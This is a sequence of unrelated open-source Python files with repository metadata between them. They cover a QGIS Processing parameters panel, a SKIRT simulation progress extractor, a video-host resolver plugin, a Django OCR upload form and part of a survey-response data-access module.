from processing.gui.FixedTablePanel import FixedTablePanel
from processing.gui.RangePanel import RangePanel
from processing.gui.MultipleInputPanel import MultipleInputPanel
from processing.gui.NumberInputPanel import NumberInputPanel
from processing.gui.ExtentSelectionPanel import ExtentSelectionPanel
from processing.gui.FileSelectionPanel import FileSelectionPanel
from processing.gui.CrsSelectionPanel import CrsSelectionPanel
from processing.gui.GeometryPredicateSelectionPanel import \
GeometryPredicateSelectionPanel
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterTable
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterTableField
from processing.core.parameters import ParameterSelection
from processing.core.parameters import ParameterFixedTable
from processing.core.parameters import ParameterRange
from processing.core.parameters import ParameterMultipleInput
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterExtent
from processing.core.parameters import ParameterFile
from processing.core.parameters import ParameterCrs
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterGeometryPredicate
from processing.core.outputs import OutputRaster
from processing.core.outputs import OutputTable
from processing.core.outputs import OutputVector
from processing.tools import dataobjects
pluginPath = os.path.split(os.path.dirname(__file__))[0]
WIDGET, BASE = uic.loadUiType(
os.path.join(pluginPath, 'ui', 'widgetParametersPanel.ui'))
class ParametersPanel(BASE, WIDGET):
NOT_SELECTED = QCoreApplication.translate('ParametersPanel', '[Not selected]')
def __init__(self, parent, alg):
super(ParametersPanel, self).__init__(None)
self.setupUi(self)
self.grpAdvanced.hide()
self.layoutMain = self.scrollAreaWidgetContents.layout()
self.layoutAdvanced = self.grpAdvanced.layout()
self.parent = parent
self.alg = alg
self.valueItems = {}
self.labels = {}
self.widgets = {}
self.checkBoxes = {}
self.dependentItems = {}
self.iterateButtons = {}
self.initWidgets()
def initWidgets(self):
#tooltips = self.alg.getParameterDescriptions()
# If there are advanced parameters — show corresponding groupbox
for param in self.alg.parameters:
if param.isAdvanced:
self.grpAdvanced.show()
break
# Create widgets and put them in layouts
for param in self.alg.parameters:
if param.hidden:
continue
desc = param.description
if isinstance(param, ParameterExtent):
desc += self.tr(' (xmin, xmax, ymin, ymax)')
try:
if param.optional:
desc += self.tr(' [optional]')
except:
pass
widget = self.getWidgetFromParameter(param)
self.valueItems[param.name] = widget
if isinstance(param, ParameterVector) and \
not self.alg.allowOnlyOpenedLayers:
layout = QHBoxLayout()
layout.setSpacing(2)
layout.setMargin(0)
layout.addWidget(widget)
button = QToolButton()
icon = QIcon(os.path.join(pluginPath, 'images', 'iterate.png'))
button.setIcon(icon)
button.setToolTip(self.tr('Iterate over this layer'))
button.setCheckable(True)
layout.addWidget(button)
self.iterateButtons[param.name] = button
button.toggled.connect(self.buttonToggled)
widget = QWidget()
widget.setLayout(layout)
#~ if param.name in tooltips.keys():
#~ tooltip = tooltips[param.name]
#~ else:
#~ tooltip = param.description
#~ widget.setToolTip(tooltip)
if isinstance(param, ParameterBoolean):
widget.setText(desc)
if param.isAdvanced:
self.layoutAdvanced.addWidget(widget)
else:
self.layoutMain.insertWidget(
self.layoutMain.count() - 2, widget)
else:
label = QLabel(desc)
#label.setToolTip(tooltip)
self.labels[param.name] = label
if param.isAdvanced:
self.layoutAdvanced.addWidget(label)
self.layoutAdvanced.addWidget(widget)
else:
self.layoutMain.insertWidget(
self.layoutMain.count() - 2, label)
self.layoutMain.insertWidget(
self.layoutMain.count() - 2, widget)
self.widgets[param.name] = widget
for output in self.alg.outputs:
if output.hidden:
continue
label = QLabel(output.description)
widget = OutputSelectionPanel(output, self.alg)
self.layoutMain.insertWidget(self.layoutMain.count() - 1, label)
self.layoutMain.insertWidget(self.layoutMain.count() - 1, widget)
if isinstance(output, (OutputRaster, OutputVector, OutputTable)):
check = QCheckBox()
check.setText(self.tr('Open output file after running algorithm'))
check.setChecked(True)
self.layoutMain.insertWidget(self.layoutMain.count() - 1, check)
self.checkBoxes[output.name] = check
self.valueItems[output.name] = widget
def buttonToggled(self, value):
if value:
sender = self.sender()
for button in self.iterateButtons.values():
if button is not sender:
button.setChecked(False)
def getExtendedLayerName(self, layer):
authid = layer.crs().authid()
if ProcessingConfig.getSetting(ProcessingConfig.SHOW_CRS_DEF) \
and authid is not None:
return u'{} [{}]'.format(layer.name(), authid)
else:
return layer.name()
def getWidgetFromParameter(self, param):
# TODO Create Parameter widget class that holds the logic
# for creating a widget that belongs to the parameter.
if isinstance(param, ParameterRaster):
layers = dataobjects.getRasterLayers()
items = []
if param.optional:
items.append((self.NOT_SELECTED, None))
for layer in layers:
items.append((self.getExtendedLayerName(layer), layer))
item = InputLayerSelectorPanel(items, param)
elif isinstance(param, ParameterVector):
if self.somethingDependsOnThisParameter(param) or self.alg.allowOnlyOpenedLayers:
item = QComboBox()
layers = dataobjects.getVectorLayers(param.shapetype)
layers.sort(key=lambda lay: lay.name())
if param.optional:
item.addItem(self.NOT_SELECTED, None)
for layer in layers:
item.addItem(self.getExtendedLayerName(layer), layer)
item.currentIndexChanged.connect(self.updateDependentFields)
item.name = param.name
else:
layers = dataobjects.getVectorLayers(param.shapetype)
items = []
if param.optional:
items.append((self.NOT_SELECTED, None))
for layer in layers:
items.append((self.getExtendedLayerName(layer), layer))
# if already set, put first in list
                for i, (name, layer) in enumerate(items):
if layer and layer.source() == param.value:
items.insert(0, items.pop(i))
item = InputLayerSelectorPanel(items, param)
elif isinstance(param, ParameterTable):
if self.somethingDependsOnThisParameter(param):
item = QComboBox()
layers = dataobjects.getTables()
if param.optional:
item.addItem(self.NOT_SELECTED, None)
for layer in layers:
item.addItem(layer.name(), layer)
item.currentIndexChanged.connect(self.updateDependentFields)
item.name = param.name
else:
layers = dataobjects.getTables()
items = []
if param.optional:
items.append((self.NOT_SELECTED, None))
for layer in layers:
items.append((layer.name(), layer))
# if already set, put first in list
                for i, (name, layer) in enumerate(items):
if layer and layer.source() == param.value:
items.insert(0, items.pop(i))
item = InputLayerSelectorPanel(items, param)
elif isinstance(param, ParameterBoolean):
item = QCheckBox()
if param.default:
item.setChecked(True)
else:
item.setChecked(False)
elif isinstance(param, ParameterTableField):
item = QComboBox()
if param.parent in self.dependentItems:
items = self.dependentItems[param.parent]
else:
items = []
self.dependentItems[param.parent] = items
items.append(param.name)
parent = self.alg.getParameterFromName(param.parent)
if isinstance(parent, ParameterVector):
layers = dataobjects.getVectorLayers(parent.shapetype)
else:
layers = dataobjects.getTables()
if len(layers) > 0:
if param.optional:
item.addItem(self.tr('[not set]'))
item.addItems(self.getFields(layers[0], param.datatype))
elif isinstance(param, ParameterSelection):
item = QComboBox()
item.addItems(param.options)
item.setCurrentIndex(param.default)
elif isinstance(param, ParameterFixedTable):
item = FixedTablePanel(param)
elif isinstance(param, ParameterRange):
item = RangePanel(param)
elif isinstance(param, ParameterFile):
item = FileSelectionPanel(param.isFolder, param.ext)
elif isinstance(param, ParameterMultipleInput):
if param.datatype == ParameterMultipleInput.TYPE_FILE:
item = MultipleInputPanel(datatype=ParameterMultipleInput.TYPE_FILE)
else:
if param.datatype == ParameterMultipleInput.TYPE_RASTER:
options = dataobjects.getRasterLayers(sorting=False)
elif param.datatype == ParameterMultipleInput.TYPE_VECTOR_ANY:
options = dataobjects.getVectorLayers(sorting=False)
else:
options = dataobjects.getVectorLayers([param.datatype], sorting=False)
opts = []
for opt in options:
opts.append(self.getExtendedLayerName(opt))
item = MultipleInputPanel(opts)
elif isinstance(param, ParameterNumber):
item = NumberInputPanel(param.default, param.min, param.max,
param.isInteger)
elif isinstance(param, ParameterExtent):
item = ExtentSelectionPanel(self.parent, self.alg, param.default)
elif isinstance(param, ParameterCrs):
item = CrsSelectionPanel(param.default)
elif isinstance(param, ParameterString):
if param.multiline:
verticalLayout = QVBoxLayout()
verticalLayout.setSizeConstraint(
QLayout.SetDefaultConstraint)
textEdit = QPlainTextEdit()
textEdit.setPlainText(param.default)
verticalLayout.addWidget(textEdit)
item = textEdit
else:
item = QLineEdit()
item.setText(unicode(param.default))
elif isinstance(param, ParameterGeometryPredicate):
item = GeometryPredicateSelectionPanel(param.enabledPredicates)
if param.left:
widget = self.valueItems[param.left]
if isinstance(widget, InputLayerSelectorPanel):
widget = widget.cmbText
widget.currentIndexChanged.connect(item.onLeftLayerChange)
item.leftLayer = widget.itemData(widget.currentIndex())
if param.right:
widget = self.valueItems[param.right]
if isinstance(widget, InputLayerSelectorPanel):
widget = widget.cmbText
widget.currentIndexChanged.connect(item.onRightLayerChange)
item.rightLayer = widget.itemData(widget.currentIndex())
item.updatePredicates()
item.setValue(param.default)
else:
item = QLineEdit()
item.setText(unicode(param.default))
return item
def updateDependentFields(self):
sender = self.sender()
if not isinstance(sender, QComboBox):
return
if sender.name not in self.dependentItems:
return
layer = sender.itemData(sender.currentIndex())
children = self.dependentItems[sender.name]
for child in children:
widget = self.valueItems[child]
widget.clear()
if self.alg.getParameterFromName(child).optional:
widget.addItem(self.tr('[not set]'))
widget.addItems(self.getFields(layer,
self.alg.getParameterFromName(child).datatype))
def getFields(self, layer, datatype):
fieldTypes = []
if datatype == ParameterTableField.DATA_TYPE_STRING:
fieldTypes = [QVariant.String]
elif datatype == ParameterTableField.DATA_TYPE_NUMBER:
fieldTypes = [QVariant.Int, QVariant.Double, QVariant.ULongLong,
QVariant.UInt]
fieldNames = set()
for field in layer.pendingFields():
if not fieldTypes or field.type() in fieldTypes:
fieldNames.add(unicode(field.name()))
return sorted(list(fieldNames), cmp=locale.strcoll)
def somethingDependsOnThisParameter(self, parent):
for param in self.alg.parameters:
if isinstance(param, ParameterTableField):
if param.parent == parent.name:
return True
return False
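# Illustrative usage sketch (not part of the original module): constructing the panel
# for an algorithm. 'parent_dialog' and 'algorithm' are assumed to stand in for the
# AlgorithmDialog and GeoAlgorithm instances that Processing normally supplies.
def _example_build_panel(parent_dialog, algorithm):
    panel = ParametersPanel(parent_dialog, algorithm)
    # valueItems maps each parameter and output name to the widget created for it
    return panel.valueItems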
|
gpl-2.0
| 8,098,731,851,604,483,000
| 42.492228
| 143
| 0.58792
| false
| 4.84922
| false
| false
| false
|
SKIRT/PTS
|
core/extract/progress.py
|
1
|
16047
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.extract.progress Contains the ProgressTable class and the ProgressExtractor class.
# The latter class is used for extracting simulation progress from a simulation's log files into a ProgressTable object.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.table import Table
# Import the relevant PTS classes and modules
from ..basics.log import log
# -----------------------------------------------------------------
class NoProgressData(Exception):
"""
This class ...
"""
def __init__(self, message, simulation_name=None):
"""
        This function ...
:param message:
:param simulation_name:
"""
# Call the base class constructor with the parameters it needs
super(NoProgressData, self).__init__(message)
# The simulation name
self.simulation_name = simulation_name
# -----------------------------------------------------------------
class ProgressTable(Table):
"""
    This class ...
"""
@classmethod
def from_columns(cls, process_list, phase_list, seconds_list, progress_list):
"""
This function ...
:param process_list:
:param phase_list:
:param seconds_list:
:param progress_list:
:return:
"""
names = ["Process rank", "Phase", "Time", "Progress"]
data = [process_list, phase_list, seconds_list, progress_list]
# Call the constructor of the base class
table = cls(data, names=names, masked=True)
# Set the column units
table["Time"].unit = "s"
table["Progress"].unit = "%"
table.path = None
return table
# -----------------------------------------------------------------
@classmethod
def from_file(cls, path):
"""
This function ...
:param path:
:return:
"""
# Open the table
#table = cls.read(path, format="ascii.ecsv")
table = super(ProgressTable, cls).read(path, format="ascii.ecsv")
# Set the path
table.path = path
# Return the table
return table
# -----------------------------------------------------------------
@classmethod
def from_remote_file(cls, path, remote):
"""
This function ...
:param path:
:param remote:
:return:
"""
# Open the contents
contents = remote.get_text(path)
# Open the table
table = cls.read(contents, format="ascii.ecsv")
# Return the table
return table
# -----------------------------------------------------------------
def save(self):
"""
This function ...
:return:
"""
# Save to the current path
self.saveto(self.path)
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
# Write the table in ECSV format
self.write(path, format="ascii.ecsv")
# Set the path
self.path = path
# -----------------------------------------------------------------
def extract_progress_cwd():
"""
    This function ...
:return:
"""
from pts.core.simulation.simulation import createsimulations
# Create a SkirtSimulation object based on a log file present in the current working directory
simulation = createsimulations(single=True)
# Create a new ProgressExtractor instance
extractor = ProgressExtractor()
# Run the extractor and get the table
extractor.run(simulation)
table = extractor.table
# Return the progress table
return table
# -----------------------------------------------------------------
class ProgressExtractor(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# -- Attributes --
self.log_files = None
#self.staggered = None
self.table = None
# The output path
self.output_path = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None):
"""
This function ...
:return:
"""
# 1. Call the setup function
self.setup(simulation, output_path=output_path)
# 2. Perform the extraction
self.extract()
# 3. Write the results
if self.output_path is not None: self.write()
# -----------------------------------------------------------------
def setup(self, simulation, output_path=None):
"""
This function ...
:param simulation:
:param output_path:
:return:
"""
# Obtain the log files created by the simulation
self.log_files = simulation.logfiles()
# Determine whether the emission spectra calculation was performed using a staggered assignment scheme
# self.staggered = simulation.parameters().staggered()
# Set the output path
self.output_path = output_path
# -----------------------------------------------------------------
def extract(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Extracting ...")
number_of_processes = None
# Initialize lists for the columns
process_list = []
phase_list = []
seconds_list = []
progress_list = []
# Loop over the log files again and fill the column lists
for log_file in self.log_files:
# Get the total number of processes
if number_of_processes is None: number_of_processes = log_file.processes
else: assert number_of_processes == log_file.processes
# Get the process rank associated with this log file
process = log_file.process
stellar_start = None
spectra_start = None
dust_start = None
first_spectra_phase = True
last_dust_phase = False
total_entries = None
entries_per_process = None
# Loop over the entries in the log file
for i in range(len(log_file.contents)):
# Get the description of the current simulation phase
phase = log_file.contents["Phase"][i]
# The current log message
message = log_file.contents["Message"][i]
# The log file entries corresponding to the stellar emission phase
if phase == "stellar":
# If this is the log message that marks the very start of the stellar emission phase, record the associated time
if "photon packages for" in message:
stellar_start = log_file.contents["Time"][i]
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds_list.append(0.0)
# Get the progress and add it to the list
progress_list.append(0.0)
# If this is one of the log messages that log stellar emission progress
elif "Launched stellar emission photon packages" in message:
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - stellar_start).total_seconds()
# Get the progress and add it to the list
try: progress = float(message.split("packages: ")[1].split("%")[0])
except: continue # INVALID LINE
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds and progress
seconds_list.append(seconds)
progress_list.append(progress)
# The log file entries corresponding to the stellar emission phase
elif phase == "spectra" and first_spectra_phase:
# If this is the log message that marks the very start of the spectra calculation, record the associated time
# If this log message states the total number of library entries that are used, record this number
if "Library entries in use" in message:
spectra_start = log_file.contents["Time"][i]
# Get the total number of library entries in use and the number of entries per process
total_entries = int(message.split("use: ")[1].split(" out of")[0])
entries_per_process = total_entries / number_of_processes
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds_list.append(0.0)
# Get the progress and add it to the list
progress_list.append(0.0)
elif "Calculating emission for" in message:
entry = float(message.split()[-1][:-3])
# Determine the progress
#if self.staggered: fraction = entry / total_entries
#else: fraction = (entry - process * entries_per_process) / entries_per_process
fraction = entry / total_entries
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - spectra_start).total_seconds()
seconds_list.append(seconds)
# Get the progress and add it to the list
progress = float(fraction*100.0)
progress_list.append(progress)
# The log file entries corresponding to the dust emission phase
# We only want to record the progress of the 'last' dust emission phase
elif phase == "dust" and last_dust_phase:
# If this is the log message that marks the very start of the dust emission phase, record the associated time
if "photon packages for" in message:
dust_start = log_file.contents["Time"][i]
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds_list.append(0.0)
# Get the progress and add it to the list
progress_list.append(0.0)
# If this is one of the log messages that log dust emission progress
elif "Launched dust emission photon packages" in message:
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - dust_start).total_seconds()
# Get the progress and add it to the list
try: progress = float(message.split("packages: ")[1].split("%")[0])
except: continue # INVALID LINE
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds and progress
seconds_list.append(seconds)
progress_list.append(progress)
# Record the end of the spectra calculation (the first log message of the emission phase of the self-absorption cycle)
elif phase == "dust" and first_spectra_phase:
# If this line indicates the end of the dust emission spectra calculation
if "Dust emission spectra calculated" in message:
# Add the process rank and phase entries
process_list.append(process)
phase_list.append("spectra")
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - spectra_start).total_seconds()
seconds_list.append(seconds)
# Add 100% progress to the list
progress_list.append(100.0)
# Indicate that the first spectra phase has already been processed (subsequent spectra phases can be ignored)
first_spectra_phase = False
# Log messages that fall in between phases
elif phase is None:
# The current log message
message = log_file.contents["Message"][i]
# Look for messages indicating whether this dust photon shooting phase corresponds to
# one of the dust self-absorption cycles or the actual dust emission phase
if "dust self-absorption cycle" in message: last_dust_phase = False
elif "Starting the dust emission phase" in message: last_dust_phase = True
elif "Finished the stellar emission phase" in message:
# Add the process rank and phase entries
process_list.append(process)
phase_list.append("stellar")
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - stellar_start).total_seconds()
seconds_list.append(seconds)
# Add 100% progress to the list
progress_list.append(100.0)
elif "Finished the dust emission phase" in message:
# Add the process rank and phase entries
process_list.append(process)
phase_list.append("dust")
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - dust_start).total_seconds()
seconds_list.append(seconds)
# Add 100% progress to the list
progress_list.append(100.0)
# Create the progress table
self.table = ProgressTable.from_columns(process_list, phase_list, seconds_list, progress_list)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Writing ...")
# Write the table to file
self.table.saveto(self.output_path)
# -----------------------------------------------------------------
def clear(self):
"""
This function ...
:return:
"""
# Set the table to None
self.table = None
# -----------------------------------------------------------------
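# Illustrative usage sketch (not part of the original module): running the extractor on
# a simulation and returning the table. 'simulation' is assumed to be a SkirtSimulation
# instance; 'output_path' is a hypothetical file path for the ECSV output.
def _example_extract_progress(simulation, output_path="progress.dat"):
    extractor = ProgressExtractor()
    extractor.run(simulation, output_path=output_path)  # also writes the table because output_path is set
    return extractor.table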
|
agpl-3.0
| 3,470,374,518,671,627,000
| 31.881148
| 134
| 0.491836
| false
| 5.149551
| false
| false
| false
|
felipenaselva/felipe.repository
|
script.module.resolveurl/lib/resolveurl/plugins/trt.py
|
1
|
1776
|
'''
    trt resolveurl plugin
Copyright (C) 2014 Eldorado
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from lib import helpers
from resolveurl import common
from resolveurl.resolver import ResolveUrl, ResolverError
import re
class trtResolver(ResolveUrl):
name = "trt"
domains = ["trt.pl"]
pattern = '(?://|\.)(trt\.pl)/(?:film)/([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'Referer': web_url, 'User-Agent': common.FF_USER_AGENT}
html = self.net.http_GET(web_url, headers=headers).content
pages = re.findall('href="([^"]+)[^>]+class="mainPlayerQualityHref"[^>]+>(.*?)</a>', html)
if pages:
try: pages.sort(key=lambda x: int(x[1][:-1]), reverse=True)
except: pass
html = self.net.http_GET('https://www.trt.pl' + pages[0][0], headers=headers).content
sources = helpers.scrape_sources(html, scheme='https')
return helpers.pick_source(sources) + helpers.append_headers(headers)
def get_url(self, host, media_id):
return 'https://www.trt.pl/film/%s' % media_id
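# Illustrative usage sketch (not part of the original plugin): resolving a playable URL.
# The media id below is a made-up placeholder and a live network connection is assumed.
def _example_resolve(media_id='abc123'):
    resolver = trtResolver()
    return resolver.get_media_url('trt.pl', media_id)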
|
gpl-2.0
| 3,321,776,893,372,562,000
| 37.608696
| 98
| 0.671734
| false
| 3.609756
| false
| false
| false
|
mikesname/python-ocrlab
|
ocrsite/ocrlab/forms/__init__.py
|
1
|
1274
|
"""Ocrlab forms."""
from django import forms
from django.template.defaultfilters import filesizeformat
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from ocrlab.models import Preset
# Add to your settings file
CONTENT_TYPES = ['image', 'video']
# 2.5MB - 2621440
# 5MB - 5242880
# 10MB - 10485760
# 20MB - 20971520
# 50MB - 52428800
# 100MB - 104857600
# 250MB - 262144000
# 500MB - 524288000
MAX_UPLOAD_SIZE = 20971520
class SimpleOcrForm(forms.Form):
file = forms.FileField()
async = forms.BooleanField(required=False)
preset = forms.ModelChoiceField(queryset=Preset.objects.all())
def clean_file(self):
content = self.cleaned_data['file']
content_type = content.content_type.split('/')[0]
if content_type in CONTENT_TYPES:
if content._size > MAX_UPLOAD_SIZE:
raise forms.ValidationError(_('Please keep filesize under %s. Current filesize %s') % (
filesizeformat(MAX_UPLOAD_SIZE),
filesizeformat(content._size)))
else:
raise forms.ValidationError(_('File type is not supported'))
return content
class PresetForm(forms.ModelForm):
class Meta:
model = Preset
|
mit
| -1,963,474,988,661,655,800
| 28.627907
| 103
| 0.658556
| false
| 3.758112
| false
| false
| false
|
all-of-us/raw-data-repository
|
rdr_service/dao/questionnaire_response_dao.py
|
1
|
57185
|
import json
import logging
import os
import re
from datetime import datetime
from dateutil import parser
from hashlib import md5
import pytz
from sqlalchemy import or_
from sqlalchemy.orm import joinedload, subqueryload
from typing import Dict
from werkzeug.exceptions import BadRequest
from rdr_service.lib_fhir.fhirclient_1_0_6.models import questionnaireresponse as fhir_questionnaireresponse
from rdr_service.participant_enums import QuestionnaireResponseStatus, PARTICIPANT_COHORT_2_START_TIME,\
PARTICIPANT_COHORT_3_START_TIME
from rdr_service.app_util import get_account_origin_id, is_self_request
from rdr_service import storage
from rdr_service import clock, config
from rdr_service.code_constants import (
CABOR_SIGNATURE_QUESTION_CODE,
CONSENT_COHORT_GROUP_CODE,
CONSENT_FOR_DVEHR_MODULE,
CONSENT_FOR_GENOMICS_ROR_MODULE,
CONSENT_FOR_ELECTRONIC_HEALTH_RECORDS_MODULE,
CONSENT_FOR_STUDY_ENROLLMENT_MODULE,
CONSENT_PERMISSION_YES_CODE,
DVEHRSHARING_CONSENT_CODE_NOT_SURE,
DVEHRSHARING_CONSENT_CODE_YES,
DVEHR_SHARING_QUESTION_CODE,
EHR_CONSENT_QUESTION_CODE,
EHR_CONSENT_EXPIRED_QUESTION_CODE,
GENDER_IDENTITY_QUESTION_CODE,
LANGUAGE_OF_CONSENT,
PMI_SKIP_CODE,
PPI_EXTRA_SYSTEM,
PPI_SYSTEM,
RACE_QUESTION_CODE,
CONSENT_GROR_YES_CODE,
CONSENT_GROR_NO_CODE,
CONSENT_GROR_NOT_SURE,
GROR_CONSENT_QUESTION_CODE,
CONSENT_COPE_YES_CODE,
CONSENT_COPE_NO_CODE,
CONSENT_COPE_DEFERRED_CODE,
COPE_CONSENT_QUESTION_CODE,
STREET_ADDRESS_QUESTION_CODE,
STREET_ADDRESS2_QUESTION_CODE,
EHR_CONSENT_EXPIRED_YES,
PRIMARY_CONSENT_UPDATE_QUESTION_CODE,
COHORT_1_REVIEW_CONSENT_YES_CODE,
COPE_VACCINE_MINUTE_1_MODULE_CODE)
from rdr_service.dao.base_dao import BaseDao
from rdr_service.dao.code_dao import CodeDao
from rdr_service.dao.participant_dao import ParticipantDao
from rdr_service.dao.participant_summary_dao import (
ParticipantGenderAnswersDao,
ParticipantRaceAnswersDao,
ParticipantSummaryDao,
)
from rdr_service.dao.questionnaire_dao import QuestionnaireHistoryDao, QuestionnaireQuestionDao
from rdr_service.field_mappings import FieldType, QUESTIONNAIRE_MODULE_CODE_TO_FIELD, QUESTION_CODE_TO_FIELD
from rdr_service.model.code import Code, CodeType
from rdr_service.model.questionnaire import QuestionnaireHistory, QuestionnaireQuestion
from rdr_service.model.questionnaire_response import QuestionnaireResponse, QuestionnaireResponseAnswer,\
QuestionnaireResponseExtension
from rdr_service.model.survey import Survey, SurveyQuestion, SurveyQuestionOption, SurveyQuestionType
from rdr_service.participant_enums import (
QuestionnaireDefinitionStatus,
QuestionnaireStatus,
TEST_LOGIN_PHONE_NUMBER_PREFIX,
get_gender_identity,
get_race,
ParticipantCohort,
ConsentExpireStatus)
_QUESTIONNAIRE_PREFIX = "Questionnaire/"
_QUESTIONNAIRE_HISTORY_SEGMENT = "/_history/"
_QUESTIONNAIRE_REFERENCE_FORMAT = _QUESTIONNAIRE_PREFIX + "{}" + _QUESTIONNAIRE_HISTORY_SEGMENT + "{}"
_SIGNED_CONSENT_EXTENSION = "http://terminology.pmi-ops.org/StructureDefinition/consent-form-signed-pdf"
_LANGUAGE_EXTENSION = "http://hl7.org/fhir/StructureDefinition/iso21090-ST-language"
_CATI_EXTENSION = "http://all-of-us.org/fhir/forms/non-participant-author"
def count_completed_baseline_ppi_modules(participant_summary):
baseline_ppi_module_fields = config.getSettingList(config.BASELINE_PPI_QUESTIONNAIRE_FIELDS, [])
return sum(
1
for field in baseline_ppi_module_fields
if getattr(participant_summary, field) == QuestionnaireStatus.SUBMITTED
)
def count_completed_ppi_modules(participant_summary):
ppi_module_fields = config.getSettingList(config.PPI_QUESTIONNAIRE_FIELDS, [])
return sum(
1 for field in ppi_module_fields if getattr(participant_summary, field, None) == QuestionnaireStatus.SUBMITTED
)
def get_first_completed_baseline_time(participant_summary):
baseline_authored = getattr(participant_summary, 'baselineQuestionnairesFirstCompleteAuthored')
if baseline_authored:
return baseline_authored
baseline_ppi_module_fields = config.getSettingList(config.BASELINE_PPI_QUESTIONNAIRE_FIELDS, [])
baseline_time = datetime(1000, 1, 1)
for field in baseline_ppi_module_fields:
field_value = getattr(participant_summary, field + "Authored")
if not field_value:
return None
else:
if field_value > baseline_time:
baseline_time = field_value
return baseline_time
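# Illustrative sketch (not part of the original module): combining the helper functions
# above for one participant; 'summary' is assumed to be a ParticipantSummary instance.
def _example_summary_module_counts(summary):
    return (count_completed_baseline_ppi_modules(summary),
            count_completed_ppi_modules(summary),
            get_first_completed_baseline_time(summary))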
class ResponseValidator:
def __init__(self, questionnaire_history: QuestionnaireHistory, session):
self.session = session
self._questionnaire_question_map = self._build_question_id_map(questionnaire_history)
self.survey = self._get_survey_for_questionnaire_history(questionnaire_history)
if self.survey is not None:
self._code_to_question_map = self._build_code_to_question_map()
if self.survey.redcapProjectId is not None:
logging.info('Validating imported survey')
# Get the skip code id
self.skip_code_id = self.session.query(Code.codeId).filter(Code.value == PMI_SKIP_CODE).scalar()
if self.skip_code_id is None:
logging.error('Unable to load PMI_SKIP code')
def _get_survey_for_questionnaire_history(self, questionnaire_history: QuestionnaireHistory):
survey_query = self.session.query(Survey).filter(
Survey.codeId.in_([concept.codeId for concept in questionnaire_history.concepts]),
Survey.importTime < questionnaire_history.created,
or_(
Survey.replacedTime.is_(None),
Survey.replacedTime > questionnaire_history.created
)
).options(
joinedload(Survey.questions).joinedload(SurveyQuestion.options).joinedload(SurveyQuestionOption.code)
)
num_surveys_found = survey_query.count()
if num_surveys_found == 0:
logging.warning(
f'No survey definition found for questionnaire id "{questionnaire_history.questionnaireId}" '
f'version "{questionnaire_history.version}"'
)
elif num_surveys_found > 1:
logging.warning(
f'Multiple survey definitions found for questionnaire id "{questionnaire_history.questionnaireId}" '
f'version "{questionnaire_history.version}"'
)
return survey_query.first()
def _build_code_to_question_map(self) -> Dict[int, SurveyQuestion]:
return {survey_question.code.codeId: survey_question for survey_question in self.survey.questions}
@classmethod
def _build_question_id_map(cls, questionnaire_history: QuestionnaireHistory) -> Dict[int, QuestionnaireQuestion]:
return {question.questionnaireQuestionId: question for question in questionnaire_history.questions}
@classmethod
def _validate_min_max(cls, answer, min_str, max_str, parser_function, question_code):
try:
if min_str:
min_parsed = parser_function(min_str)
if answer < min_parsed:
logging.warning(
f'Given answer "{answer}" is less than expected min "{min_str}" for question {question_code}'
)
if max_str:
max_parsed = parser_function(max_str)
if answer > max_parsed:
logging.warning(
f'Given answer "{answer}" is greater than expected max "{max_str}" for question {question_code}'
)
except (parser.ParserError, ValueError):
logging.error(f'Unable to parse validation string for question {question_code}', exc_info=True)
def _check_answer_has_expected_data_type(self, answer: QuestionnaireResponseAnswer,
question_definition: SurveyQuestion,
questionnaire_question: QuestionnaireQuestion):
question_code_value = questionnaire_question.code.value
if answer.valueCodeId == self.skip_code_id:
            # Any question can be answered with a skip, so there isn't anything to check in that case
return
if question_definition.questionType in (SurveyQuestionType.UNKNOWN,
SurveyQuestionType.DROPDOWN,
SurveyQuestionType.RADIO,
SurveyQuestionType.CHECKBOX):
number_of_selectable_options = len(question_definition.options)
if number_of_selectable_options == 0 and answer.valueCodeId is not None:
logging.warning(
f'Answer for {question_code_value} gives a value code id when no options are defined'
)
elif number_of_selectable_options > 0:
if answer.valueCodeId is None:
logging.warning(
f'Answer for {question_code_value} gives no value code id when the question has options defined'
)
elif answer.valueCodeId not in [option.codeId for option in question_definition.options]:
logging.warning(f'Code ID {answer.valueCodeId} is an invalid answer to {question_code_value}')
elif question_definition.questionType in (SurveyQuestionType.TEXT, SurveyQuestionType.NOTES):
if question_definition.validation is None and answer.valueString is None:
logging.warning(f'No valueString answer given for text-based question {question_code_value}')
